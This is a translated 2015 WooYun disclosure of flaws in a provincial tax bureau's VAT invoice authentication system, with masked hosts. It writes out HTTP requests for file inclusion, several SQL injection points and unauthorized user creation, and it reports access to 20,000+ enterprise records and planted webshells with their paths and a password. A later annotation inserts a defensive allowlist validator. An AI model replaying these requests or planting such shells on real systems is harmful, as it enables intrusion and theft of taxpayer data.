
Vulnerability summary

Defect ID: wooyun-2015-0155648

Title: Heilongjiang Provincial State Taxation Bureau, bundled vulnerabilities in one of its systems (file inclusion, multiple SQL injections, unauthorized access, getshell, etc.)

Vendor: Heilongjiang Provincial State Taxation Bureau

Author: 路人甲

Submitted: 2015-11-25 14:58

Fixed: 2016-01-11 15:32

Published: 2016-01-11 15:32

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (CNCERT, the National Computer Network Emergency Response Technical Team) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-11-25: Details sent to the vendor; awaiting vendor handling
2015-11-27: Vendor confirmed; details disclosed to the vendor only
2015-12-07: Details disclosed to core white hats and experts in the relevant field
2015-12-17: Details disclosed to regular white hats
2015-12-27: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public

Brief description:

Bundled vulnerabilities (file inclusion, multiple SQL injections, unauthorized access, getshell, 20000+ enterprise records, etc.)
Look how much I've bundled here; give me a front-page spot, holding a place on the leaderboard isn't easy
~ I was originally keeping these hidden, planning to look for a generic one

Details:

http://**.**.**.**:8700/
Heilongjiang Provincial State Taxation Bureau VAT special invoice deduction copy information authentication system

[Screenshot: QQ截图20151124211515.png]


1# File inclusion

POST http://**.**.**.**:8700/changePass HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://**.**.**.**:8700/ChangePassword1.jsp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: **.**.**.**:8700
Content-Length: 121
Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=WS2f7PNPyJhmnwS2qvf2FVTnnMJ1wxTGfFgL8KMy721kyKxJhb9f!-2087357998
Username=null&oldpassword=123&newpassword=123&PwdConfirm=123&Submit=+%C8%B7+%EF%BF%BD%EF%BF%BD+&page=%2FWEB-INF%2Fweb.xml


Note the `page` parameter

[Screenshot: QQ截图20151124211640.png]
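An allowlist check for the `page` forward parameter shown above, added here as an example; it is not code from the report or from the affected system. The handler above forwards to whatever path the client supplies, so this models the server-side validation that refuses container-internal paths and anything outside a fixed set of views. The function names, the allowed JSP names and the sample bodies are assumptions.

```python
import posixpath
from typing import Optional
from urllib.parse import parse_qs, unquote

# Assumed allowlist of JSP views the changePass handler may forward to.
ALLOWED_FORWARDS = {"/ChangePassword1.jsp", "/ChangePassword2.jsp", "/index.jsp"}
# Container-internal directories that must never be reachable by a forward.
PROTECTED_PREFIXES = ("/WEB-INF/", "/META-INF/")


def resolve_forward(page: str) -> Optional[str]:
    """Return the canonical forward target, or None if it must be refused."""
    # Decode twice so a double-encoded value (%252F) cannot slip past the check.
    decoded = unquote(unquote(page)).replace("\\", "/")
    if "\x00" in decoded:
        return None
    # Drop any query string, force an absolute path and collapse ./ and ../ segments.
    path = posixpath.normpath("/" + decoded.split("?", 1)[0].lstrip("/"))
    if path.upper().startswith(tuple(p.upper() for p in PROTECTED_PREFIXES)):
        return None
    # Only exact, known view names are forwarded; everything else is refused.
    return path if path in ALLOWED_FORWARDS else None


def check_body(body: str) -> dict:
    """Parse a form-encoded POST body and evaluate its `page` field."""
    fields = parse_qs(body, keep_blank_values=True)
    page = fields.get("page", [""])[0]
    target = resolve_forward(page)
    return {"page": page, "target": target, "blocked": target is None}


# Constructed sample bodies; the first mirrors the request quoted in the report.
SAMPLES = [
    "Username=null&oldpassword=123&newpassword=123&page=%2FWEB-INF%2Fweb.xml",
    "Username=admin&oldpassword=123&newpassword=123&page=%2FChangePassword1.jsp",
    "Username=admin&page=..%2F..%2FWEB-INF%2Fweb.xml",
    "Username=admin&page=%252FWEB-INF%252Fweb.xml",
]

if __name__ == "__main__":
    for body in SAMPLES:
        r = check_body(body)
        print("BLOCK" if r["blocked"] else "ALLOW", repr(r["page"]), "->", r["target"])
```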


2# SQL injection (I'd guess the one in the login form has already been found; mine is the forgot-password one, not the same spot)

POST http://**.**.**.**:8700/changePass HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://**.**.**.**:8700/ChangePassword1.jsp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: **.**.**.**:8700
Content-Length: 111
Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=WS2f7PNPyJhmnwS2qvf2FVTnnMJ1wxTGfFgL8KMy721kyKxJhb9f!-2087357998
Username=admin&oldpassword=123&newpassword=123&PwdConfirm=123&Submit=+%C8%B7+%B6%A8+&page=%2FChangePassword1.jsp


[Screenshot: QQ截图20151124211128.png]


[Screenshot: QQ截图20151124211158.png]


Supports --os-shell

[Screenshot: QQ截图20151124211411.png]


A shell can be written

[Screenshot: QQ截图20151124211808.png]

Proof of vulnerability:

Let me add the login-form one as well, in case it's not the same system

POST http://**.**.**.**:8700/CheckLoginServlet HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://**.**.**.**:8700/
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: **.**.**.**:8700
Content-Length: 37
Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=WJh12qsKpm8xlXTSQm1rGwFNwnlz55hF9pSxggwPrQvzP6J190tm!-2087357998
UserName=admin&Password=admin&x=0&y=0


3# Unauthorized access (this one is rather interesting)
http://**.**.**.**:8700/Add_User.jsp

[Screenshot: QQ截图20151124212007.png]


Click "Search users"

[Screenshot: QQ截图20151124212030.png]


This request body sends the SQL statement directly, which is rather bizarre

[Screenshot: QQ截图20151124212115.png]


Although the user passwords are now known, they can't be decrypted, so we add a new user
with as many privileges as possible

[Screenshot: QQ截图20151124212249.png]


[Screenshot: QQ截图20151124212313.png]


You know what that means
We're in the system

[Screenshot: QQ截图20151124212340.png]


20000+ enterprise records

[Screenshot: QQ截图20151124212426.png]


Actually, only once inside the system do you realize it: this system has injection everywhere and inclusion everywhere; all you have to do is try

POST http://**.**.**.**:8700/UserInfoServlet?action_type=query HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://**.**.**.**:8700/query.jsp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: **.**.**.**:8700
Content-Length: 91
Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=WJh12qsKpm8xlXTSQm1rGwFNwnlz55hF9pSxggwPrQvzP6J190tm!-2087357998
UserID=2&UserName=1&donet_type=1&douser_type=1&repages=%2Fquery.jsp&totalsize=1&pageno=1


[Screenshot: QQ截图20151124213708.png]


POST http://**.**.**.**:8700/ErrorDataListServlet?action_type=query HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://**.**.**.**:8700/ErrorDataList.jsp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: **.**.**.**:8700
Content-Length: 112
Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=WJh12qsKpm8xlXTSQm1rGwFNwnlz55hF9pSxggwPrQvzP6J190tm!-2087357998
nsrList=2&nsrName=&OpeType=3&dfrom=20151101&dto=20151124&repages=%2FErrorDataList.jsp&totalsize=null&pageno=null


[Screenshot: QQ截图20151124213543.png]


[Screenshot: QQ截图20151124213920.png]


Too many spots to run results for each one
4# shell

[Screenshot: QQ截图20151124213849.png]


Searching and searching for the path
shell: http://**.**.**.**:8700/wpp.jsp
http://**.**.**.**:8700/haoma.jsp

[Screenshot: QQ截图20151124214842.png]


Password: 4423054

[Screenshot: QQ截图20151124215030.png]


[Screenshot: QQ截图20151124215039.png]

Fix recommendation:

Take the system offline and get a patch from the vendor

Copyright notice: when reposting, please credit 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2015-11-27 15:10

Vendor reply:

CNVD has confirmed and reproduced the described vulnerabilities; the case has been forwarded through CNCERT to its Heilongjiang branch center, which will coordinate handling with the website's operating unit.

Latest status:

None yet